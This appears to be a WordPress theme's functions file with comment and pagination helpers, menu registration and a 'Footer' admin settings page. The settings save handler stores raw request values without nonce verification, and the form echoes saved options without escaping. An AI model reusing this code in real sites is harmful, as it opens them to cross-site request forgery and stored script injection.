if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
